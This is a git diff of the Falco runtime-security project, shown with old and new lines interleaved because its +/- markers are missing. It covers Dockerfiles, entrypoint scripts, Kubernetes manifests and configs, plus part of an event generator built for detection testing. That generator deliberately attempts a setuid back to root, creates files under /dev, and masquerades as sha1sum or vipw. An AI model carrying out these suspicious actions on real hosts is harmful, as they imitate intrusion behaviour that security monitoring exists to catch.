printf("Becoming the program \"sha1sum\" and then performing network activity\n");
respawn("./sha1sum", "network_activity", "0");
}
void non_sudo_setuid()
{
void non_sudo_setuid() {
pid_t child;
printf("Forking a child that becomes \"daemon\" user and then \"root\"...\n");
// Fork a child and do everything in the child.
if((child = fork()) == 0)
if ((child = fork()) == 0)
{
// First setuid to something non-root. Then try to setuid back to root.
become_user("daemon");
@@ -351,8 +340,7 @@ void non_sudo_setuid()
}
}
void create_files_below_dev()
{
void create_files_below_dev() {
printf("Creating /dev/created-by-event-generator-sh...\n");
touch("/dev/created-by-event-generator-sh");
}
@@ -364,8 +352,7 @@ void exec_ls()
spawn("/bin/ls", argv, env);
}
void user_mgmt_binaries()
{
void user_mgmt_binaries() {
printf("Becoming the program \"vipw\" and then running the program /bin/ls\n");
printf("NOTE: does not result in a falco notification in containers\n");
respawn("./vipw", "exec_ls", "0");
@@ -406,11 +393,11 @@ void create_symlinks(const char *program)
// sets up all the required symlinks.
const char *progs[] = {"./httpd", "./mysqld", "./sha1sum", "./vipw", NULL};
for(unsigned int i = 0; progs[i] != NULL; i++)
for (unsigned int i=0; progs[i] != NULL; i++)
{
unlink(progs[i]);
if((rc = symlink(program, progs[i])) != 0)
if ((rc = symlink(program, progs[i])) != 0)
{
fprintf(stderr, "Could not link \"./event_generator\" to \"%s\": %s\n", progs[i], strerror(errno));
}
@@ -419,9 +406,9 @@ void create_symlinks(const char *program)
void run_actions(map<string, action_t> &actions, int interval, bool once)
{
while(true)
while (true)
{
for(auto action : actions)
for (auto action : actions)
{
printf("***Action %s\n", action.first.c_str());
action.second();
@@ -444,13 +431,14 @@ int main(int argc, char **argv)
map<string, action_t>::iterator it;
static struct option long_options[] =
{
{"help", no_argument, 0, 'h'},
{"action", required_argument, 0, 'a'},
{"interval", required_argument, 0, 'i'},
{"once", no_argument, 0, 'o'},
{
{"help", no_argument, 0, 'h' },
{"action", required_argument, 0, 'a' },
{"interval", required_argument, 0, 'i' },
{"once", no_argument, 0, 'o' },
{0, 0}};
{0, 0}
};
//
// Parse the args
@@ -466,7 +454,7 @@ int main(int argc, char **argv)
exit(1);
case 'a':
// "all" is already implied
if(strcmp(optarg, "all") != 0)
if (strcmp(optarg, "all") != 0)
{
if((it = defined_actions.find(optarg)) == defined_actions.end())
{
@@ -489,8 +477,8 @@ int main(int argc, char **argv)
}
//
// Also look for actions in the environment. If specified, they
// override any specified on the command line.
// Also look for actions in the environment. If specified, they
// override any specified on the command line.
//
char *env_action = getenv("EVENT_GENERATOR_ACTIONS");
@@ -501,7 +489,7 @@ int main(int argc, char **argv)
string envs(env_action);
istringstream ss(envs);
string item;
while(std::getline(ss, item, ':'))
while (std::getline(ss, item, ':'))
{
if((it = defined_actions.find(item)) == defined_actions.end())
{
@@ -526,7 +514,7 @@ int main(int argc, char **argv)
setvbuf(stdout, NULL, _IONBF, 0);
setvbuf(stderr, NULL, _IONBF, 0);
// Only create symlinks when running as the program event_generator
if(strstr(argv[0], "generator"))
if (strstr(argv[0], "generator"))
{
create_symlinks(argv[0]);
}

38
docker/kernel/linuxkit/Dockerfile
View File

@@ -1,38 +0,0 @@
ARG ALPINE_VERSION=3.10
ARG KERNEL_VERSION=4.9.184
ARG FALCO_VERSION=0.18.0
FROM linuxkit/kernel:${KERNEL_VERSION} AS ksrc
FROM falcosecurity/falco-minimal:${FALCO_VERSION} as falco
FROM alpine:${ALPINE_VERSION} AS probe-build
LABEL maintainer="opensource@sysdig.com"
ARG KERNEL_VERSION=4.9.184
ARG FALCO_VERSION=0.18.0
ENV FALCO_VERSION=${FALCO_VERSION}
ENV KERNEL_VERSION=${KERNEL_VERSION}
COPY --from=ksrc /kernel-dev.tar /
COPY --from=falco /usr/src/falco-${FALCO_VERSION} /usr/src/falco-${FALCO_VERSION}
RUN apk add --no-cache --update \
build-base gcc abuild binutils \
bc \
autoconf && \
export KERNELVER=`uname -r | cut -d '-' -f 1` && \
export KERNELDIR=/usr/src/linux-headers-${KERNEL_VERSION}-linuxkit/ && \
tar xf /kernel-dev.tar && \
cd $KERNELDIR && \
zcat /proc/1/root/proc/config.gz > .config && \
make olddefconfig && \
cd /usr/src/falco-${FALCO_VERSION} && \
make && \
apk del \
build-base gcc abuild binutils \
bc \
autoconf
FROM alpine:${ALPINE_VERSION}
ARG FALCO_VERSION=0.18.0
ENV FALCO_VERSION=${FALCO_VERSION}
COPY --from=probe-build /usr/src/falco-${FALCO_VERSION}/falco-probe.ko /
CMD ["insmod","/falco-probe.ko"]

18
docker/kernel/probeloader/Dockerfile
View File

@@ -1,18 +0,0 @@
FROM golang:1.13-alpine AS build
ARG FALCOCTL_REF=2be3df92edbac668284fe5c165ccb5bd6bf4e869
RUN apk --no-cache add build-base git gcc ca-certificates
RUN git clone https://github.com/falcosecurity/falcoctl.git /falcoctl
WORKDIR /falcoctl
RUN git checkout ${FALCOCTL_REF}
RUN go mod vendor
RUN CGO_ENABLED=0 GOOS=linux go build -a -o falcoctl -ldflags '-extldflags "-static"' .
FROM scratch
LABEL maintainer="opensource@sysdig.com"
COPY --from=build /etc/ssl/certs/ca-certificates.crt /etc/ssl/certs/ca-certificates.crt
COPY --from=build /falcoctl/falcoctl /falcoctl
CMD ["/falcoctl", "install", "probe"]

50
docker/local/Dockerfile
View File

@@ -1,12 +1,12 @@
FROM debian:unstable
LABEL usage="docker run -i -t -v /var/run/docker.sock:/host/var/run/docker.sock -v /dev:/host/dev -v /proc:/host/proc:ro -v /boot:/host/boot:ro -v /lib/modules:/host/lib/modules:ro -v /usr:/host/usr:ro --name NAME IMAGE"
LABEL maintainer="opensource@sysdig.com"
LABEL maintainer="Sysdig <support@sysdig.com>"
ARG FALCO_VERSION=
RUN test -n FALCO_VERSION
ARG FALCO_VERSION=0.1.1dev
ENV FALCO_VERSION ${FALCO_VERSION}
LABEL RUN="docker run -i -t -v /var/run/docker.sock:/host/var/run/docker.sock -v /dev:/host/dev -v /proc:/host/proc:ro -v /boot:/host/boot:ro -v /lib/modules:/host/lib/modules:ro -v /usr:/host/usr:ro --name NAME IMAGE"
ENV SYSDIG_HOST_ROOT /host
ENV HOME /root
@@ -16,32 +16,22 @@ RUN cp /etc/skel/.bashrc /root && cp /etc/skel/.profile /root
ADD http://download.draios.com/apt-draios-priority /etc/apt/preferences.d/
RUN apt-get update \
&& apt-get install -y --no-install-recommends \
bash-completion \
bc \
clang-7 \
ca-certificates \
curl \
dkms \
gnupg2 \
gcc \
jq \
libc6-dev \
libelf-dev \
llvm-7 \
netcat \
xz-utils \
libmpc3 \
binutils \
libgomp1 \
libitm1 \
libatomic1 \
liblsan0 \
libtsan0 \
libmpx2 \
libquadmath0 \
libcc1-0 \
&& rm -rf /var/lib/apt/lists/*
&& apt-get install -y --no-install-recommends \
bash-completion \
bc \
clang-7 \
ca-certificates \
curl \
dkms \
gnupg2 \
gcc \
jq \
libc6-dev \
libelf-dev \
llvm-7 \
netcat \
xz-utils \
&& rm -rf /var/lib/apt/lists/*
# gcc 6 is no longer included in debian unstable, but we need it to
# build kernel modules on the default debian-based ami used by

3
docker/local/docker-entrypoint.sh
View File

@@ -1,7 +1,8 @@
#!/bin/bash
#
# Copyright (C) 2019 The Falco Authors.
# Copyright (C) 2016-2018 Draios Inc dba Sysdig.
#
# This file is part of falco.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.

50
docker/minimal/Dockerfile
View File

@@ -1,50 +0,0 @@
FROM ubuntu:18.04 as ubuntu
LABEL maintainer="opensource@sysdig.com"
ARG FALCO_VERSION=0.18.0
ENV FALCO_VERSION=${FALCO_VERSION}
WORKDIR /
ADD https://s3.amazonaws.com/download.draios.com/stable/tgz/x86_64/falco-${FALCO_VERSION}-x86_64.tar.gz /
# ADD will download from URL and unntar
RUN apt-get update && \
apt-get install -y binutils && \
# curl -O https://s3.amazonaws.com/download.draios.com/stable/tgz/x86_64/falco-${FALCO_VERSION}-x86_64.tar.gz && \
tar xfzv falco-${FALCO_VERSION}-x86_64.tar.gz && \
rm -f falco-${FALCO_VERSION}-x86_64.tar.gz && \
mv falco-${FALCO_VERSION}-x86_64 falco && \
strip falco/usr/bin/falco && \
apt-get clean && \
rm -rf /var/lib/apt/lists/*
FROM scratch
COPY --from=ubuntu /lib/x86_64-linux-gnu/libanl.so.1 \
/lib/x86_64-linux-gnu/libc.so.6 /lib/x86_64-linux-gnu/libdl.so.2 \
/lib/x86_64-linux-gnu/libgcc_s.so.1 /lib/x86_64-linux-gnu/libm.so.6 \
/lib/x86_64-linux-gnu/libnsl.so.1 /lib/x86_64-linux-gnu/libnss_compat.so.2 \
/lib/x86_64-linux-gnu/libnss_files.so.2 /lib/x86_64-linux-gnu/libnss_nis.so.2 \
/lib/x86_64-linux-gnu/libpthread.so.0 /lib/x86_64-linux-gnu/librt.so.1 \
/lib/x86_64-linux-gnu/libz.so.1 \
/lib/x86_64-linux-gnu/
COPY --from=ubuntu /usr/lib/x86_64-linux-gnu/libstdc++.so.6 \
/usr/lib/x86_64-linux-gnu/libstdc++.so.6
COPY --from=ubuntu /etc/ld.so.cache \
/etc/nsswitch.conf \
/etc/ld.so.cache \
/etc/passwd \
/etc/group \
/etc/
COPY --from=ubuntu /etc/default/nss /etc/default/nss
COPY --from=ubuntu /lib64/ld-linux-x86-64.so.2 /lib64/ld-linux-x86-64.so.2
COPY --from=ubuntu /falco /
CMD ["/usr/bin/falco", "-o", "time_format_iso_8601=true"]

3
docker/rhel/docker-entrypoint.sh
View File

@@ -1,7 +1,8 @@
#!/bin/bash
#
# Copyright (C) 2019 The Falco Authors.
# Copyright (C) 2016-2018 Draios Inc dba Sysdig.
#
# This file is part of falco.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.

50
docker/slim-dev/Dockerfile
View File

@@ -1,50 +0,0 @@
FROM ubuntu:18.04
LABEL maintainer="opensource@sysdig.com"
ENV FALCO_REPOSITORY dev
LABEL RUN="docker run -i -t -v /var/run/docker.sock:/host/var/run/docker.sock -v /dev:/host/dev -v /proc:/host/proc:ro -v /boot:/host/boot:ro -v /lib/modules:/host/lib/modules:ro -v /usr:/host/usr:ro --name NAME IMAGE"
ENV SYSDIG_HOST_ROOT /host
ENV HOME /root
RUN cp /etc/skel/.bashrc /root && cp /etc/skel/.profile /root
ADD http://download.draios.com/apt-draios-priority /etc/apt/preferences.d/
RUN apt-get update \
&& apt-get install -y --no-install-recommends \
# bash-completion \
# bc \
ca-certificates \
curl \
gnupg2 \
jq \
# netcat \
# xz-utils \
&& rm -rf /var/lib/apt/lists/*
RUN curl -s https://s3.amazonaws.com/download.draios.com/DRAIOS-GPG-KEY.public | apt-key add - \
&& curl -s -o /etc/apt/sources.list.d/draios.list http://download.draios.com/$FALCO_REPOSITORY/deb/draios.list \
&& apt-get update \
&& apt-get install -y --no-install-recommends falco \
&& apt-get clean \
&& rm -rf /var/lib/apt/lists/*
# Change the falco config within the container to enable ISO 8601
# output.
RUN sed -e 's/time_format_iso_8601: false/time_format_iso_8601: true/' < /etc/falco/falco.yaml > /etc/falco/falco.yaml.new \
&& mv /etc/falco/falco.yaml.new /etc/falco/falco.yaml
# Some base images have an empty /lib/modules by default
# If it's not empty, docker build will fail instead of
# silently overwriting the existing directory
RUN rm -df /lib/modules \
&& ln -s $SYSDIG_HOST_ROOT/lib/modules /lib/modules
#COPY ./entrypoint.sh /
# ENTRYPOINT ["/entrypoint.sh"]
CMD ["/usr/bin/falco", "-o", "time_format_iso_8601=true"]

50
docker/slim-stable/Dockerfile
View File

@@ -1,50 +0,0 @@
FROM ubuntu:18.04
LABEL maintainer="opensource@sysdig.com"
ENV FALCO_REPOSITORY stable
LABEL RUN="docker run -i -t -v /var/run/docker.sock:/host/var/run/docker.sock -v /dev:/host/dev -v /proc:/host/proc:ro -v /boot:/host/boot:ro -v /lib/modules:/host/lib/modules:ro -v /usr:/host/usr:ro --name NAME IMAGE"
ENV SYSDIG_HOST_ROOT /host
ENV HOME /root
RUN cp /etc/skel/.bashrc /root && cp /etc/skel/.profile /root
ADD http://download.draios.com/apt-draios-priority /etc/apt/preferences.d/
RUN apt-get update \
&& apt-get install -y --no-install-recommends \
# bash-completion \
# bc \
ca-certificates \
curl \
gnupg2 \
jq \
# netcat \
# xz-utils \
&& rm -rf /var/lib/apt/lists/*
RUN curl -s https://s3.amazonaws.com/download.draios.com/DRAIOS-GPG-KEY.public | apt-key add - \
&& curl -s -o /etc/apt/sources.list.d/draios.list http://download.draios.com/$FALCO_REPOSITORY/deb/draios.list \
&& apt-get update \
&& apt-get install -y --no-install-recommends falco \
&& apt-get clean \
&& rm -rf /var/lib/apt/lists/*
# Change the falco config within the container to enable ISO 8601
# output.
RUN sed -e 's/time_format_iso_8601: false/time_format_iso_8601: true/' < /etc/falco/falco.yaml > /etc/falco/falco.yaml.new \
&& mv /etc/falco/falco.yaml.new /etc/falco/falco.yaml
# Some base images have an empty /lib/modules by default
# If it's not empty, docker build will fail instead of
# silently overwriting the existing directory
RUN rm -df /lib/modules \
&& ln -s $SYSDIG_HOST_ROOT/lib/modules /lib/modules
#COPY ./entrypoint.sh /
# ENTRYPOINT ["/entrypoint.sh"]
CMD ["/usr/bin/falco", "-o", "time_format_iso_8601=true"]

3
docker/stable/Dockerfile
View File

@@ -1,6 +1,6 @@
FROM debian:unstable
LABEL maintainer="opensource@sysdig.com"
LABEL maintainer="Sysdig <support@sysdig.com>"
ENV FALCO_REPOSITORY stable
@@ -27,7 +27,6 @@ RUN apt-get update \
jq \
libc6-dev \
libelf-dev \
libmpx2 \
llvm-7 \
netcat \
xz-utils \

3
docker/stable/docker-entrypoint.sh
View File

@@ -1,7 +1,8 @@
#!/bin/bash
#
# Copyright (C) 2019 The Falco Authors.
# Copyright (C) 2016-2018 Draios Inc dba Sysdig.
#
# This file is part of falco.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.

23
docker/tester/Dockerfile
View File

@@ -1,16 +1,17 @@
FROM fedora:28
FROM centos:7
LABEL name="falcosecurity/falco-tester"
LABEL usage="docker run -v /boot:/boot:ro -v /var/run/docker.sock:/var/run/docker.sock -v $PWD/..:/source -v $PWD/build:/build -e FALCO_VERSION=<current_falco_version> --name <name> falcosecurity/falco-tester test"
LABEL maintainer="opensource@sysdig.com"
ENV FALCO_VERSION 0.1.1dev
ENV BUILD_TYPE Release
ENV FALCO_VERSION=
ENV BUILD_TYPE=release
RUN yum -y install epel-release && \
yum -y install \
python-pip \
docker \
jq \
unzip
RUN curl https://avocado-project.org/data/repos/avocado-fedora.repo -o /etc/yum.repos.d/avocado.repo && \
dnf install -y docker findutils jq unzip python2-avocado python2-avocado-plugins-varianter-yaml-to-mux && dnf clean all
RUN pip install avocado-framework avocado-framework-plugin-varianter-yaml-to-mux
COPY ./root /
COPY entrypoint.sh /
ENTRYPOINT ["entrypoint"]
CMD ["usage"]
ENTRYPOINT ["/entrypoint.sh"]

24
docker/tester/entrypoint.sh Executable file
View File

@@ -0,0 +1,24 @@
#!/bin/bash
set -euxo pipefail
SOURCE_DIR=/source
BUILD_DIR=/build
TASK=${1:-test}
if [ $TASK == "test" ]; then
echo "Building local docker image falcosecurity/falco:test from latest debian package..."
cp $BUILD_DIR/$BUILD_TYPE/falco*.deb $BUILD_DIR/$BUILD_TYPE/docker/local
cd $BUILD_DIR/$BUILD_TYPE/docker/local && docker build --build-arg FALCO_VERSION=${FALCO_VERSION} -t falcosecurity/falco:test .
echo "Running regression tests"
cd $SOURCE_DIR/falco/test
bash run_regression_tests.sh $BUILD_DIR/$BUILD_TYPE
docker rmi falcosecurity/falco:test || true
exit 0
fi
if [ $TASK == "bash" ]; then
exec /bin/bash
fi

57
docker/tester/root/usr/bin/entrypoint
View File

@@ -1,57 +0,0 @@
#!/usr/bin/env bash
set -eu -o pipefail
SOURCE_DIR=/source
BUILD_DIR=/build
CMD=${1:-test}
shift
# Build type can be "debug" or "release", fallbacks to "release" by default
BUILD_TYPE=$(echo "$BUILD_TYPE" | tr "[:upper:]" "[:lower:]")
case "$BUILD_TYPE" in
"debug")
;;
*)
BUILD_TYPE="release"
;;
esac
case "$CMD" in
"test")
if [ ! -d "$BUILD_DIR/$BUILD_TYPE/docker/local" ]; then
echo "Missing $BUILD_DIR/$BUILD_TYPE/docker/local directory." >&2
exit 1
fi
if [ -z "$FALCO_VERSION" ]; then
echo "Missing Falco version." >&2
exit 1
fi
PACKAGE="$BUILD_DIR/$BUILD_TYPE/falco-$FALCO_VERSION-x86_64.deb"
if [ ! -f "$PACKAGE" ]; then
echo "Package(s) not found." >&2
exit 1
fi
DOCKER_IMAGE_NAME="falcosecurity/falco:test"
echo "Building local docker image $DOCKER_IMAGE_NAME from latest debian package..."
cp "$PACKAGE" $BUILD_DIR/$BUILD_TYPE/docker/local
cd $BUILD_DIR/$BUILD_TYPE/docker/local
docker build --build-arg FALCO_VERSION="$FALCO_VERSION" -t "$DOCKER_IMAGE_NAME" .
# Check that source directory contains Falco and Sysdig
if [ ! -d "$SOURCE_DIR/falco/test" ]; then
echo "Missing $SOURCE_DIR/falco/test directory." >&2
exit 1
fi
echo "Running regression tests ..."
cd $SOURCE_DIR/falco/test
bash run_regression_tests.sh $BUILD_DIR/$BUILD_TYPE
docker rmi "$DOCKER_IMAGE_NAME" || true
;;
"bash")
CMD=/bin/bash
;& # fallthrough
"usage")
exec "$CMD" "$@"
;;
esac

41
docker/tester/root/usr/bin/usage
View File

@@ -1,41 +0,0 @@
#!/usr/bin/env bash
pythonversion=$(python -c 'import sys; version=sys.version_info[:3]; print("{0}.{1}.{2}".format(*version))')
pipversion=$(pip --version | cut -d' ' -f 1,2,5,6)
dockerversion=$(docker --version)
avocadoversion=$(pip show avocado-framework | grep Version)
avocadoversion=${avocadoversion#"Version: "}
cat <<EOF
Hello, this is the Falco tester container.
How to use.
The default commands for the Falco tester image reports usage and environment info.
* docker run falcosecurity/falco-tester
* docker run falcosecurity/falco-tester usage
It supports bash.
* docker run -ti falcosecurity/falco-tester bash
To run Falco regression tests you need to provide:
- the docker socket
- the boot directory
- the source directory
- the directory where Falco has been built
- the environment variable FALCO_VARIABLE set to the value obtained during the Falco's build
Assuming you are running it from the Falco root directory, you can run it as follows.
* docker run -v /boot:/boot:ro -v /var/run/docker.sock:/var/run/docker.sock -v $PWD/..:/source -v $PWD/build:/build -e FALCO_VERSION=<current_falco_version> falcosecurity/falco-tester test
How to build.
* cd docker/builder && DOCKER_BUILDKIT=1 docker build -t falcosecurity/falco-tester .
Environment.
* python ${pythonversion}
* ${pipversion}
* avocado ${avocadoversion}
* ${dockerversion}
EOF

2
examples/OWNERS
View File

@@ -1,2 +0,0 @@
labels:
- area/examples

3
examples/mitm-sh-installer/web_root/install-software.sh
View File

@@ -1,7 +1,8 @@
#!/bin/bash
#
# Copyright (C) 2019 The Falco Authors.
# Copyright (C) 2016-2018 Draios Inc dba Sysdig.
#
# This file is part of falco.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.

21
falco.yaml
View File

@@ -1,6 +1,7 @@
#
# Copyright (C) 2019 The Falco Authors.
# Copyright (C) 2016-2018 Draios Inc dba Sysdig.
#
# This file is part of falco .
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
@@ -167,21 +168,3 @@ http_output:
enabled: false
url: http://some.url
# gRPC server configuration.
# The gRPC server is secure by default (mutual TLS) so you need to generate certificates and update their paths here.
# By default the gRPC server is off.
# You can configure the address to bind and expose it.
# By modifying the threadiness configuration you can fine-tune the number of threads (and context) it will use.
grpc:
enabled: false
bind_address: "0.0.0.0:5060"
threadiness: 8
private_key: "/etc/falco/certs/server.key"
cert_chain: "/etc/falco/certs/server.crt"
root_certs: "/etc/falco/certs/ca.crt"
# gRPC output service.
# By default it is off.
# By enabling this all the output events will be kept in memory until you read them with a gRPC client.
grpc_output:
enabled: false

2
integrations/OWNERS
View File

@@ -1,2 +0,0 @@
labels:
- area/integration

4
integrations/anchore-falco/README.md
View File

@@ -18,7 +18,7 @@ For running this integration you will need:
This integration uses the [same environment variables that anchore-cli](https://github.com/anchore/anchore-cli#configuring-the-anchore-cli):
* ANCHORE_CLI_USER: The user used to connect to anchore-engine. By default is ```admin```
* ANCHORE_CLI_USER: The user used to conect to anchore-engine. By default is ```admin```
* ANCHORE_CLI_PASS: The password used to connect to anchore-engine.
* ANCHORE_CLI_URL: The url where anchore-engine listens. Make sure does not end with a slash. By default is ```http://localhost:8228/v1```
* ANCHORE_CLI_SSL_VERIFY: Flag for enabling if HTTP client verifies SSL. By default is ```true```
@@ -81,7 +81,7 @@ So you can run directly with Docker:
```
docker run --rm -e ANCHORE_CLI_USER=<user-for-custom-anchore-engine> \
-e ANCHORE_CLI_PASS=<password-for-user-for-custom-anchore-engine> \
-e ANCHORE_CLI_PASS=<passsword-for-user-for-custom-anchore-engine> \
-e ANCHORE_CLI_URL=http://<custom-anchore-engine-host>:8228/v1 \
sysdig/anchore-falco
```

18
integrations/k8s-using-daemonset/README.md
View File

@@ -59,7 +59,8 @@ Now that we have the requirements for our Daemon Set in place, we can create our
```
k8s-using-daemonset$ kubectl create -f k8s-with-rbac/falco-daemonset-configmap.yaml
daemonset "falco" created
daemonset.extensions "falco-daemonset" created
k8s-using-daemonset$
```
@@ -97,14 +98,13 @@ In order to test that Falco is working correctly, you can launch a shell in a Po
```
k8s-using-daemonset$ kubectl get pods
NAME READY STATUS RESTARTS AGE
falco-74htl 1/1 Running 0 13h
falco-fqz2m 1/1 Running 0 13h
falco-sgjfx 1/1 Running 0 13h
k8s-using-daemonset$ kubectl exec -it falco-74htl bash
root@falco-74htl:/# exit
k8s-using-daemonset$ kubectl logs falco-74htl
{"output":"17:48:58.590038385: Notice A shell was spawned in a container with an attached terminal (user=root k8s.pod=falco-74htl container=a98c2aa8e670 shell=bash parent=<NA> cmdline=bash terminal=34816)","priority":"Notice","rule":"Terminal shell in container","time":"2017-12-20T17:48:58.590038385Z", "output_fields": {"container.id":"a98c2aa8e670","evt.time":1513792138590038385,"k8s.pod.name":"falco-74htl","proc.cmdline":"bash ","proc.name":"bash","proc.pname":null,"proc.tty":34816,"user.name":"root"}}
NAME READY STATUS RESTARTS AGE
falco-daemonset-b695d 1/1 Running 0 2d
falco-daemonset-n8q2v 1/1 Running 0 2d
k8s-using-daemonset$ kubectl exec -it falco-daemonset-b695d bash
root@falco-daemonset-b695d:/# exit
k8s-using-daemonset$ kubectl logs falco-daemonset-b695d
07:16:09.217866519: Error File below known binary directory renamed/removed (user=root command=event_generator pcmdline=<NA> operation=rename file=<NA> res=0 oldpath=/bin/true newpath=/bin/true.event-generator-sh ) k8s.ns=default k8s.pod=falco-event-generator-deployment-645444689b-j6mth container=0e67aad65846 k8s.ns=default k8s.pod=falco-event-generator-deployment-645444689b-j6mth container=0e67aad65846
k8s-using-daemonset$
```

96
integrations/k8s-using-daemonset/k8s-with-rbac/falco-daemonset-configmap-slim.yaml
View File

@@ -1,96 +0,0 @@
apiVersion: extensions/v1beta1
kind: DaemonSet
metadata:
name: falco-daemonset
labels:
app: falco-example
role: security
spec:
template:
metadata:
labels:
app: falco-example
role: security
spec:
serviceAccount: falco-account
initContainers:
- name: probeloader
image: falcosecurity/probeloader:latest
securityContext:
privileged: true
#env:
# - name: FALCOCTL_FALCO_VERSION
# value: 0.18.0
# - name: FALCOCTL_FALCO_PROBE_URL
# value:
# - name: FALCOCTL_FALCO_PROBE_REPO
# value: "https://s3.amazonaws.com/download.draios.com/stable/sysdig-probe-binaries/"
volumeMounts:
- mountPath: /host/boot
name: boot-fs
readOnly: true
containers:
- name: falco
image: falcosecurity/falco:0.18.0-slim
securityContext:
privileged: true
# Uncomment the 3 lines below to enable eBPF support for Falco.
# This allows Falco to run on Google COS.
# Leave blank for the default probe location, or set to the path
# of a precompiled probe.
# env:
# - name: SYSDIG_BPF_PROBE
# value: ""
args: [ "/usr/bin/falco", "--cri", "/host/run/containerd/containerd.sock", "-K", "/var/run/secrets/kubernetes.io/serviceaccount/token", "-k", "https://$(KUBERNETES_SERVICE_HOST)", "-pk"]
volumeMounts:
- mountPath: /host/var/run/docker.sock
name: docker-socket
- mountPath: /host/run/containerd/containerd.sock
name: containerd-socket
- mountPath: /host/dev
name: dev-fs
- mountPath: /host/proc
name: proc-fs
readOnly: true
- mountPath: /host/boot
name: boot-fs
readOnly: true
- mountPath: /host/lib/modules
name: lib-modules
readOnly: true
- mountPath: /host/usr
name: usr-fs
readOnly: true
- mountPath: /host/etc/
name: etc-fs
readOnly: true
- mountPath: /etc/falco
name: falco-config
volumes:
- name: docker-socket
hostPath:
path: /var/run/docker.sock
- name: containerd-socket
hostPath:
path: /run/containerd/containerd.sock
- name: dev-fs
hostPath:
path: /dev
- name: proc-fs
hostPath:
path: /proc
- name: boot-fs
hostPath:
path: /boot
- name: lib-modules
hostPath:
path: /lib/modules
- name: usr-fs
hostPath:
path: /usr
- name: etc-fs
hostPath:
path: /etc
- name: falco-config
configMap:
name: falco-config

1
integrations/k8s-using-daemonset/k8s-with-rbac/falco-daemonset-configmap.yaml
View File

@@ -33,7 +33,6 @@ spec:
name: containerd-socket
- mountPath: /host/dev
name: dev-fs
readOnly: true
- mountPath: /host/proc
name: proc-fs
readOnly: true

1
integrations/k8s-using-daemonset/k8s-without-rbac/falco-daemonset.yaml
View File

@@ -26,7 +26,6 @@ spec:
name: containerd-socket
- mountPath: /host/dev
name: dev-fs
readOnly: true
- mountPath: /host/proc
name: proc-fs
readOnly: true

62
integrations/k8s-using-deployment/README.md
View File

@@ -1,62 +0,0 @@
# Example Kubernetes Deployments for Falco
This directory gives you the required YAML files to stand up Falco on Kubernetes only for audit purpose as a Deployment.
To deploy Falco on Kubernetes for audit:
- `k8s-with-rbac` - This directory provides a definition to deploy a Deployment on Kubernetes with RBAC enabled.
Also provided:
- `falco-event-generator-deployment.yaml` - A Kubernetes Deployment to generate sample events. This is useful for testing, but note it will generate a large number of events.
## Deploying to Kubernetes with RBAC enabled
Since v1.8 RBAC has been available in Kubernetes, and running with RBAC enabled is considered the best practice. The `k8s-with-rbac` directory provides the YAML to create a Service Account for Falco, as well as the ClusterRoles and bindings to grant the appropriate permissions to the Service Account.
```
k8s-using-deployment$ kubectl create -f k8s-with-rbac/falco-k8s-audit-account.yaml
serviceaccount "falco-account" created
clusterrole "falco-cluster-role" created
clusterrolebinding "falco-cluster-role-binding" created
k8s-using-deployment$
```
We also create a service that allows other services to reach the embedded webserver in falco, which listens on https port 8765:
```
k8s-using-deployment$ kubectl create -f k8s-with-rbac/falco-k8s-audit-service.yaml
service/falco-service created
k8s-using-deployment$
```
The Deployment also relies on a Kubernetes ConfigMap to store the Falco configuration and make the configuration available to the Falco Pods. This allows you to manage custom configuration without rebuilding and redeploying the underlying Pods. In order to create the ConfigMap you'll first need to copy the required configuration from their location in this GitHub repo to the `k8s-with-rbac/falco-config/` directory (please note that you will need to create the /falco-config directory). Any modification of the configuration should be performed on these copies rather than the original files.
```
k8s-using-deployment$ mkdir -p k8s-with-rbac/falco-config
k8s-using-deployment$ cp ./falco.yaml k8s-with-rbac/falco-config/
k8s-using-deployment$ cp ../../rules/k8s_audit_rules.yaml k8s-with-rbac/falco-config/
```
If you want to send Falco alerts to a Slack channel, you'll want to modify the `falco.yaml` file to point to your Slack webhook. For more information on getting a webhook URL for your Slack team, refer to the [Slack documentation](https://api.slack.com/incoming-webhooks). Add the below to the bottom of the `falco.yaml` config file you just copied to enable Slack messages.
```
program_output:
enabled: true
keep_alive: false
program: "jq '{text: .output}' | curl -d @- -X POST https://hooks.slack.com/services/see_your_slack_team/apps_settings_for/a_webhook_url"
```
You will also need to enable JSON output. Find the `json_output: false` setting in the `falco.yaml` file and change it to read `json_output: true`. Any custom rules for your environment can be added to into the `falco_rules.local.yaml` file and they will be picked up by Falco at start time. You can now create the ConfigMap in Kubernetes.
```
k8s-using-deployment$ kubectl create configmap falco-config --from-file=k8s-with-rbac/falco-config
configmap "falco-config" created
k8s-using-deployment$
```
Now that we have the requirements for our Deployment in place, we can create our Deployment.
```
k8s-using-deployment$ kubectl create -f k8s-with-rbac/falco-k8s-audit-deployment.yaml
daemonset "falco" created
k8s-using-deployment$
```

17
integrations/k8s-using-deployment/falco-event-generator-deployment.yaml
View File

@@ -1,17 +0,0 @@
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
name: falco-event-generator-deployment
labels:
name: falco-event-generator-deployment
app: demo
spec:
replicas: 1
template:
metadata:
labels:
app: falco-event-generator
spec:
containers:
- name: falco-event-generator
image: sysdig/falco-event-generator:latest

167
integrations/k8s-using-deployment/falco.yaml
View File

@@ -1,167 +0,0 @@
#
# Copyright (C) 2016-2018 Draios Inc dba Sysdig.
#
# This file is part of falco .
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# File(s) or Directories containing Falco rules, loaded at startup.
# The name "rules_file" is only for backwards compatibility.
# If the entry is a file, it will be read directly. If the entry is a directory,
# every file in that directory will be read, in alphabetical order.
#
# falco_rules.yaml ships with the falco package and is overridden with
# every new software version. falco_rules.local.yaml is only created
# if it doesn't exist. If you want to customize the set of rules, add
# your customizations to falco_rules.local.yaml.
#
# The files will be read in the order presented here, so make sure if
# you have overrides they appear in later files.
rules_file:
- /etc/falco/k8s_audit_rules.yaml
